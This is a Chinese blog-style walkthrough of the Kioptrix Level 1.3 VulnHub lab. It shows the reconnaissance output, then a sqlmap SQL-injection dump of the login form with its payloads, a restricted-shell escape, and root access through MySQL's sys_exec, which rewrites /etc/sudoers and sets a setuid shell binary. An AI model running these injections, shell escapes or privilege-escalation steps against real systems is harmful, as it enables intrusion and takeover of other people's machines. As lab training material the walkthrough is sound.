# 靶场搭建

下载: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

下载下来就是个虚拟磁盘,不能直接打开,需要新建虚拟机,通过虚拟磁盘打开,见文章: https://blog.csdn.net/qq_32261191/article/details/106408751

NAT 模式 IP 地址: 192.168.74.136

# 信息收集

# nmap

┌──(root㉿kali)-[~]
└─# nmap -A 192.168.74.136     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:26 EDT
Nmap scan report for 192.168.74.136
Host is up (0.00041s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D3:23:98 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2024-04-07T15:27:02-04:00
|_clock-skew: mean: 10h00m02s, deviation: 2h49m43s, median: 8h00m01s

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.74.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.79 seconds

开了 22、80、139、445

┌──(root㉿kali)-[~]
└─# nmap --script=vuln 192.168.74.136                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:33 EDT
Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.21% done; ETC: 07:36 (0:00:01 remaining)
Nmap scan report for 192.168.74.136
Host is up (0.00037s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.74.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.74.136:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.74.136:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.74.136:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D3:23:98 (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 324.75 seconds

漏洞监测发现有 CSRF 和数据库备份文件、以及一个不是很关键的慢速 Dos 攻击。

# dirsearch

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.136
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                      
                                                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.74.136/_24-04-07_07-32-38.txt

Target: http://192.168.74.136/

[07:32:38] Starting:                                                                                                                                                                                         
[07:32:41] 403 -  332B  - /.ht_wsr.txt                                      
[07:32:41] 403 -  335B  - /.htaccess.bak1                                   
[07:32:41] 403 -  335B  - /.htaccess.orig
[07:32:41] 403 -  335B  - /.htaccess.save                                   
[07:32:41] 403 -  336B  - /.htaccess_extra
[07:32:41] 403 -  333B  - /.htaccess_sc
[07:32:41] 403 -  333B  - /.htaccessBAK
[07:32:41] 403 -  334B  - /.htaccessOLD2                                    
[07:32:41] 403 -  335B  - /.htaccess_orig                                   
[07:32:41] 403 -  337B  - /.htaccess.sample
[07:32:41] 403 -  326B  - /.html                                            
[07:32:41] 403 -  325B  - /.htm
[07:32:41] 403 -  335B  - /.htpasswd_test                                   
[07:32:41] 403 -  333B  - /.htaccessOLD
[07:32:41] 403 -  331B  - /.htpasswds                                       
[07:32:41] 403 -  332B  - /.httr-oauth
[07:33:04] 403 -  329B  - /cgi-bin/                                         
[07:33:05] 200 -  109B  - /checklogin                                       
[07:33:05] 200 -  109B  - /checklogin.php                                   
[07:33:09] 200 -  298B  - /database.sql                                     
[07:33:11] 403 -  325B  - /doc/                                             
[07:33:11] 403 -  340B  - /doc/en/changes.html
[07:33:11] 403 -  329B  - /doc/api/
[07:33:11] 403 -  340B  - /doc/html/index.html                              
[07:33:11] 403 -  339B  - /doc/stable.version
[07:33:20] 301 -  356B  - /images  ->  http://192.168.74.136/images/        
[07:33:20] 200 -  933B  - /images/                                          
[07:33:27] 302 -    0B  - /logout.php  ->  index.php                        
[07:33:27] 302 -    0B  - /logout  ->  index.php                            
[07:33:27] 302 -    0B  - /logout/  ->  index.php                           
[07:33:29] 302 -  220B  - /member.php  ->  index.php                        
[07:33:29] 302 -  220B  - /member  ->  index.php                            
[07:33:29] 302 -  220B  - /member/admin.asp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.aspx  ->  index.php
[07:33:29] 302 -  220B  - /member/login.jsp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.asp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.html  ->  index.php
[07:33:29] 302 -  220B  - /member/login.js  ->  index.php
[07:33:29] 302 -  220B  - /member/logon  ->  index.php
[07:33:29] 302 -  220B  - /member/signin  ->  index.php
[07:33:29] 302 -  220B  - /member/login  ->  index.php                      
[07:33:29] 302 -  220B  - /member/login.php  ->  index.php
[07:33:29] 302 -  220B  - /member/  ->  index.php
[07:33:29] 302 -  220B  - /member/login.rb  ->  index.php
[07:33:29] 302 -  220B  - /member/login.py  ->  index.php                   
[07:33:49] 403 -  334B  - /server-status                                    
[07:33:49] 403 -  335B  - /server-status/ 

看到了数据库备份文件,比较重要

# web 信息

┌──(root㉿kali)-[~]
└─# whatweb http://192.168.74.136/
http://192.168.74.136/ [200 OK] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.74.136], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], PasswordField[mypassword], X-Powered-By[PHP/5.2.4-2ubuntu5.6]

# 汇总

  • 数据库备份文件

  • CSRF 攻击

  • SSH 爆破

  • Samba 服务攻击

  • Apache2.2.8

  • PHP5.2.4

  • Linux 2.6.9 - 2.6.33

# 漏洞利用

看到这种构成就尝试 WEB 层面的攻击了

# 数据库泄露

下载下来数据库看看先

CREATE TABLE `members` (
`id` int(4) NOT NULL auto_increment,
`username` varchar(65) NOT NULL default '',
`password` varchar(65) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=2 ;
-- 
-- Dumping data for table `members`
-- 
INSERT INTO `members` VALUES (1, 'john', '1234');

看到了有个账号密码为 john/1234

那就意味着我们可以登录到 web 页面进一步尝试,登陆看看先

账号密码错误,玩我哇?直接注入!

# sql 注入

sqlmap,启动!

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:24 /2024-04-07/

[07:56:24] [INFO] testing connection to the target URL
[07:56:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:56:24] [INFO] testing if the target URL content is stable
[07:56:25] [INFO] target URL content is stable
[07:56:25] [INFO] testing if POST parameter 'myusername' is dynamic
[07:56:25] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[07:56:25] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[07:56:25] [INFO] testing for SQL injection on POST parameter 'myusername'
[07:56:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:56:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:56:29] [INFO] testing 'Generic inline queries'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:56:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:56:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[07:56:29] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] 

[07:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:56:43] [WARNING] POST parameter 'myusername' does not seem to be injectable
[07:56:43] [INFO] testing if POST parameter 'mypassword' is dynamic
[07:56:43] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[07:56:43] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[07:56:43] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 

[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:45] [INFO] testing 'Generic inline queries'
[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:56:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n] 

redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] 

[07:56:48] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL inline queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:58] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[07:56:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:56:58] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[07:56:59] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[07:56:59] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive


sqlmap identified the following injection point(s) with a total of 346 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[07:58:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[07:58:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'

[*] ending @ 07:58:01 /2024-04-07/

发现了布尔盲注和时间盲注,直接读取数据库内容: sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dbs

[*] information_schema
[*] members
[*] mysql

直接脱裤

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dump             
        ___
       __H__                                                                                                                                                                                                
 ___ ___[']_____ ___ ___  {1.8#stable}                                                                                                                                                                      
|_ -| . ["]     | .'| . |                                                                                                                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:03:52 /2024-04-07/

[08:03:52] [INFO] resuming back-end DBMS 'mysql' 
[08:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[08:03:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[08:03:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[08:03:52] [INFO] fetching current database
[08:03:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:03:52] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n] 

redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] 

members
[08:04:01] [INFO] fetching tables for database: 'members'
[08:04:01] [INFO] fetching number of tables for database 'members'
[08:04:01] [INFO] resumed: 1
[08:04:01] [INFO] resumed: members
[08:04:01] [INFO] fetching columns for table 'members' in database 'members'
[08:04:01] [INFO] retrieved: 3
[08:04:01] [INFO] retrieved: id
[08:04:01] [INFO] retrieved: username
[08:04:02] [INFO] retrieved: password
[08:04:02] [INFO] fetching entries for table 'members' in database 'members'
[08:04:02] [INFO] fetching number of entries for table 'members' in database 'members'
[08:04:02] [INFO] retrieved: 2
[08:04:02] [INFO] retrieved: 1
[08:04:02] [INFO] retrieved: MyNameIsJohn
[08:04:03] [INFO] retrieved: john
[08:04:04] [INFO] retrieved: 2
[08:04:04] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[08:04:05] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

[08:04:06] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.74.136/dump/members/members.csv'
[08:04:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'

[*] ending @ 08:04:06 /2024-04-07/

拿到账号密码,登录一下,登陆成功但是屁也没有

那就 ssh 看看能不能连上呢?

# ssh

┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
The authenticity of host '192.168.74.136 (192.168.74.136)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.74.136' (DSA) to the list of known hosts.
[email protected]'s password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 

进去了,但是一定要注意要添加 -oHostKeyAlgorithms=+ssh-dss 这个参数!因为默认的 ssh 连接不支持 DSS 的加密方式,添加参数才能连接上去!

但是连 ls 都执行不了,原来是一个受限制的 shell

受限制的 shell 以及绕过方法:https://www.aldeid.com/wiki/Lshell

需要绕过到正常的交互式 shell 中

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ whoami
john

拿到了正常的 shell,但是仍然是低权限

接下来就要想办法提权了

他的网站需要与数据库进行交互,如果数据库有 root 权限的话也许能进行提权,查看一下呢?

john@Kioptrix4:~$ ps -aux | grep mysql
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root      4419  0.0  0.1   1772   528 ?        S    15:20   0:00 /bin/sh /usr/bin/mysqld_safe
root      4461  0.0  3.3 127224 17304 ?        Sl   15:20   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3
root      4463  0.0  0.1   1700   556 ?        S    15:20   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
john      4911  0.0  0.1   3004   756 pts/0    R+   16:43   0:00 grep mysql

非常好,我们看到数据库是 root 权限运行的,那么我们尝试进行提权

# 提权

尝试登录数据库,可以尝试空密码、已获得的密码、去网站配置文件找密码或者干脆爆破

因为是本地,尝试下空密码

john@Kioptrix4:~$ mysql -u root -h localhost
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4918
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>

直接进来噜

修改 sudoers 文件的权限

mysql> SELECT sys_exec('chown john:john /etc/sudoers');
+------------------------------------------+
| sys_exec('chown john:john /etc/sudoers') |
+------------------------------------------+
| NULL                                     | 
+------------------------------------------+
1 row in set (0.00 sec)

将 john 账号添加至 sudoer 中

john@Kioptrix4:~$ chmod 777 /etc/sudoers
john@Kioptrix4:~$ vim /etc/sudoers 
# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root    ALL=(ALL) ALL
john    ALL=NOPASSWD :ALL
# Uncomment to allow members of group sudo to not need a password
# (Note that later entries override this, so you might need to move
# it further down)
# %sudo ALL=NOPASSWD: ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

这样 sudo 切换 root 账号不需要输入密码就行

保存后还要将权限改回去

john@Kioptrix4:~$ chmod 0440 /etc/sudoers
mysql> select sys_exec('chown root:root /etc/sudoers');
+------------------------------------------+
| sys_exec('chown root:root /etc/sudoers') |
+------------------------------------------+
| NULL                                     | 
+------------------------------------------+
1 row in set (0.00 sec)
mysql> exit
Bye
john@Kioptrix4:~$ sudo su
root@Kioptrix4:/home/john# whoami
root

拿到 root 权限!

还有一个哥们用的 C 语言写的程序,进行提权,通过上传编译后的脚本,通过 mysql 的 root 权限运行拿到 bash。

下面是 C 语言的源代码

#include <unistd.h>
int main()
{
    // 设置实际用户 ID、有效用户 ID 和保存的用户 ID 为 0,即 root 用户
    setresuid(0, 0, 0);
    
    // 设置实际组 ID、有效组 ID 和保存的组 ID 为 0,即 root 用户所在的组
    setresgid(0, 0, 0);
    
    // 调用 system 函数执行 /bin/bash 命令,启动一个交互式的 bash shell
    system("/bin/bash");
    
    return 0;
}

通过设置编译文件 777 权限,使用 john 运行 exploit,就可以拿到 root 权限

mysql> SELECT sys_exec('chmod +s,a+rwx /tmp/exploit');

# 小结

通过登录接口进行 sql 注入

获取账号密码后通过 dds 加密方式登录 ssh

绕过垃圾 shell,通过 root 权限进行提权

我还尝试用 metasploit 中的 ssh_login 登录后返回 session,在进行 udf 提权,但是 ssh 加密方式在这个模块中不支持。于是想要尝试反弹 shell 进行,但是 bash 没办法反弹,知道原因的老哥踢我